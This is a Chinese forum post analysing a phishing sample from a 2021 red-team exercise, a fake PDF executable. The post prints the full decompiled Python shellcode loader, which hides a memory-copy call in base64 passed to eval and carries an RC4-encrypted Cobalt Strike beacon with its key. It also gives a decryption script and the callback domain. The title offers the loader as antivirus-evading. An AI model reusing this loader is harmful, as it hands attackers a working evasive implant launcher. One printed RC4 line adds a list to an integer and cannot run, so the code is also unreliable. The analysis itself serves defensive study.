设为首页 收藏本站

QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 电脑教程分享 帖子
微信扫一扫 分享朋友圈

已有 2326 人浏览分享

2021HW-某红队样本分析附免杀shellcode加载器

[复制链接]
2326 0
0x01 邮件原文与样本

hw期间内部邮箱网关收到了钓鱼邮件

邮件原文如下

m7458IoMzHlqFUj.jpg

1008.jpg

解压后得到样本
财险内部旅游套餐方案.pdf.exe
样本为大小为5.88M,HASH如下
MD5
5bc32973b43593207626c0588fc6247e
SHA-1
551414cb283a56cf55817c720c2efee0144ea2ed
SHA-256
d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad
VT报毒 14/69 免杀效果尚可

69.png

68.png

通过Yara规则检测 为典型的Cobaltstrike x64 https beacon载荷

66.png

基于程序体积和逆向后获取到的函数判断 该恶意样本为Python编写的shellcodeloader来
加载CS https beacon X64 shellcode,后用py2exe程序进行封装。

MCG2PbtSm3jvkXs.jpg

对该程序进行逆向unpy2exe逆向分析 取得其源码
  1. \# uncompyle6 version 3.7.4
  2. \# Python bytecode 3.7
  3. \# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18)
  4. [MSC v.1900 64 bit (AMD64)]
  5. \# Embedded file name: py36test.py
  6. import ctypes, urllib, base64, requests, hashlib
  7. def shellCodeLoad(shellcode):
  8.   ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
  9.   ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)),
  10. ctypes.c_int(12288), ctypes.c_int(64))
  11.   buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  12.   eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3Vp
  13. bnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='))
  14.   handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr),
  15. ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
  16.   ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
  17. def rc4(text, key):
  18.   key = hashlib.md5(key).hexdigest()
  19.   text = base64.b64decode(text)
  20.   result = ''
  21.   key_len = len(key)
  22.   box = list(range(256))
  23.   j = 0
  24.   for i in range(256):
  25.      j = (j + box[i] + ord(key[(i % key_len)])) % 256
  26.      box[i], box[j] = box[j], box[i]
  27.   i = j = 0
  28.   for element in text:
  29.      i = (i + 1) % 256
  30.      j = (j + box[i]) % 256
  31.      box[i], box[j] = box[j], box[i]
  32.      k = chr(element ^ box[((box + box[j]) % 256)])
  33.      result += k
  34.   return result
  35. if __name__ == '__main__':
  36.   b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY
  37. 2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5
  38. Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8q
  39. opN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHqqUprU4
  40. 3eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFpt
  41. rZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNh
  42. PYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxT
  43. tzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8
  44. F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmln
  45. x8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmu
  46. Xesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+
  47. 7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg
  48. 0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qE
  49. ipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5Ika
  50. U0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ
  51. 3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5C
  52. PgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGO
  53. S2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+
  54. VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/
  55. RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
  56.   mm = 'king6666'
  57.   c = rc4(b, mm.encode('utf-8'))
  58.   code = bytearray(base64.b64decode(c))
  59.   shellCodeLoad(code)
复制代码

分析得出该恶意样本是通过rc4算法解密base64加密的shellcode

并且使用VirtualAlloc开辟内存空间放入内存中执行

编写解密脚本
  1. import ctypes, urllib, base64, requests, hashlib
  2. def rc4(text, key):
  3.   key = hashlib.md5(key).hexdigest()
  4.   text = base64.b64decode(text)
  5.   result = ''
  6.   key_len = len(key)
  7.   box = list(range(256))
  8.   j = 0
  9.   for i in range(256):
  10.      j = (j + box[i] + ord(key[(i % key_len)])) % 256
  11.      box[i], box[j] = box[j], box[i]
  12.   i = j = 0
  13.   for element in text:
  14.      i = (i + 1) % 256
  15.      j = (j + box[i]) % 256
  16.      box[i], box[j] = box[j], box[i]
  17.      k = chr(element ^ box[((box + box[j]) % 256)])
  18.      result += k
  19.   return result
  20. b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2Q
  21. CJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76F
  22. cuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8q
  23. MZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3F
  24. MLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2
  25. mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ
  26. 1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUd
  27. MtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4
  28. xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9py
  29. dXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F6
  30. 6/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7
  31. X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6Rip
  32. hkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6k
  33. ZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh
  34. 9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7As
  35. IDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0D
  36. lE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2F
  37. B585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7z
  38. Wc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHt
  39. UGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
  40. mm = 'king6666'
  41. c = rc4(b, mm.encode('utf-8'))
  42. code = bytearray(base64.b64decode(c))
  43. print(code)
复制代码

得到其shellcode

62.png

回连地址为www.alibababaa.com
为典型的cobaltstrike https x64 beacon shellcode
至此 分析结束

举报

回复
返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

zhaorong
VIP荣誉会员

1

关注

0

粉丝

9021

主题
精彩推荐
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子技术论坛GHOST WIN10X64 快速装机版201909
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子技术论坛GHOST WIN10X86 快速装机版201909
电脑疯子技术论坛GHOST WIN10X86 快速装机
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.